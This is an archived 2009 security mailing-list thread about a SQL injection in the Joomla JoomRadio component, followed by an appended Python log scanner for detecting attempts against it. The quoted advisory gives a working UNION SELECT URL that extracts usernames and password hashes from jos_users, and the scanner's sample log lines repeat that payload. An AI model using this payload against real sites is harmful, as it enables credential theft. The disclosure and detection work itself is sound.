Date: Thu, 19 Feb 2009 16:37:26 +0000
From: infolookup@...il.com
To: bobby.mugabe@...hmail.com, full-disclosure-bounces@...ts.grok.org.uk,
	zeus.olimpusklan@...il.com, packet@...ketstormsecurity.org
Cc: bugtraq@...e-h.org, full-disclosure@...ts.grok.org.uk, submit@...w0rm.com,
	bugtraq@...urityfocus.com
Subject: Re: Joomla Component com_joomradio SQL Injection

Has this been tested and verified?

-----Original Message-----
From: bobby.mugabe@...hmail.com

Date: Thu, 19 Feb 2009 10:22:48 
To: <zeus.olimpusklan@...il.com>; <packet@...ketstormsecurity.org>
Cc: <bugtraq@...e-h.org>; <full-disclosure@...ts.grok.org.uk>; <submit@...w0rm.com>; <bugtraq@...urityfocus.com>
Subject: Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear gov-boi,

Please follow the established etiquette of this list by linking to
content on archive.org to establish credibility for alleged
historic content.  Linking to obscure post-dated content on your
own Internet site, that easily can be faked, isn't the best way to
attempt legitimizing your darknet archival endeavours.  Many on
this list are sceptical about your claim regarding the previous
discovery of this important computer security issue, and to be
quite frank find your attempts to discredit the king of gods'
effort to secure this critical piece of Internet infrastructure
known as the joomla joomradio something-or-other.

Mr. Zeus - on behalf of my country I would like to express our
sincere thanks for reporting this severe issue, whether or not it
was previously and independently discovered and reported, and hope
you continue to contribute your research to this list of full
disclosure and help to make the Internet a safer place for
everyone.

I would like to remind everyone that this list is for disclosure of
information security materials and that the fascist tactics used by
the packetstorm/#darknet crowd as they attempt to once again
monopolize the dissemination of information security materials are
not appreciated here.

All the best to you and yours,
- -bm


On Wed, 18 Feb 2009 17:21:10 -0500 Packet Storm
<packet@...ketstormsecurity.org> wrote:
>Already discovered in June, 2008.
>
>http://packetstormsecurity.org/0806-exploits/joomlajoomradio-sql.txt
>bc9c589fca40fce9a4f4484333f207b5
>The Joomla Joomradio component version 1.0 suffers from a remote SQL injection
>vulnerability.  Authored By His0k4 (His0k4.hlm[at]gmail.com)
>
>On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote:
>>
>> ###########################################################################
>> # Advisory X
>> # Title: Joomla Component com_joomradio SQL Injection
>> # Author: 0o_zeus_o0 ( Arturo Z. )
>> # Contact: arturo_zamora_c@...mail.com
>> # Website: www.securitybroken.com
>> # Date: 18/02/09
>> # Risk: Medium
>> # Vendor Url: http://ajaxportal.eu/
>> # Affected Software: JoomRadio
>> # autor script:author XrByte <info@....ee>, Grusha <grusha@...llove.eu>
>> ##################################################################
>> #
>> #Example:
>> ##################################################################
>> #htp://
>> victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNION
>> SELECT
>> user(),concat(username,0x3a,password),user(),user(),user(),user(),user()
>> FROM jos_users--
>> #
>> ##################################################################
>> #greetz:
>> #
>> # original advisory: http://www.securitybroken.com
>> ##################################################################
>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/

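For defenders checking web logs against the advisory quoted in this thread, the following is an added example (not part of the original messages or the advisory) that flags requests to com_joomradio whose id parameter is not a plain non-negative integer. The log lines are constructed, and treating id as integer-only is an assumption drawn from the advisory's example URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Feb/2009:10:01:02 +0000] "GET /index.php?'
    'option=com_joomradio&page=show_radio&id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [19/Feb/2009:10:03:44 +0000] "GET /index.php?'
    'option=com_joomradio&page=show_radio&id=-1%20UNION%20SELECT%20user()'
    '%20FROM%20jos_users-- HTTP/1.1" 200 734',
    '198.51.100.9 - - [19/Feb/2009:10:04:10 +0000] "GET /index.php?'
    'option=com_content&id=-1 HTTP/1.1" 200 901',
    '203.0.113.5 - - [19/Feb/2009:10:05:30 +0000] "GET /index.php?'
    'option=com_joomradio&page=show_radio&id=7%27 HTTP/1.1" 500 212',
]

# Request line inside the quoted field of a common/combined log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id is digits only (allowlist, not a keyword blocklist).
PLAIN_INT = re.compile(r"\d+")


def suspicious_joomradio_requests(lines):
    """Return (client_ip, decoded_id) for com_joomradio requests with a non-integer id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared in clear.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_joomradio" not in params.get("option", []):
            continue
        # Check every id value: a repeated parameter must not hide a bad one.
        for value in params.get("id", []):
            if not PLAIN_INT.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_joomradio_requests(SAMPLE_LOG):
        print(f"{ip}\tid={value!r}")
```

The same allowlist rule (reject anything that is not digits) is what the component itself would need to enforce before using id in a query.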
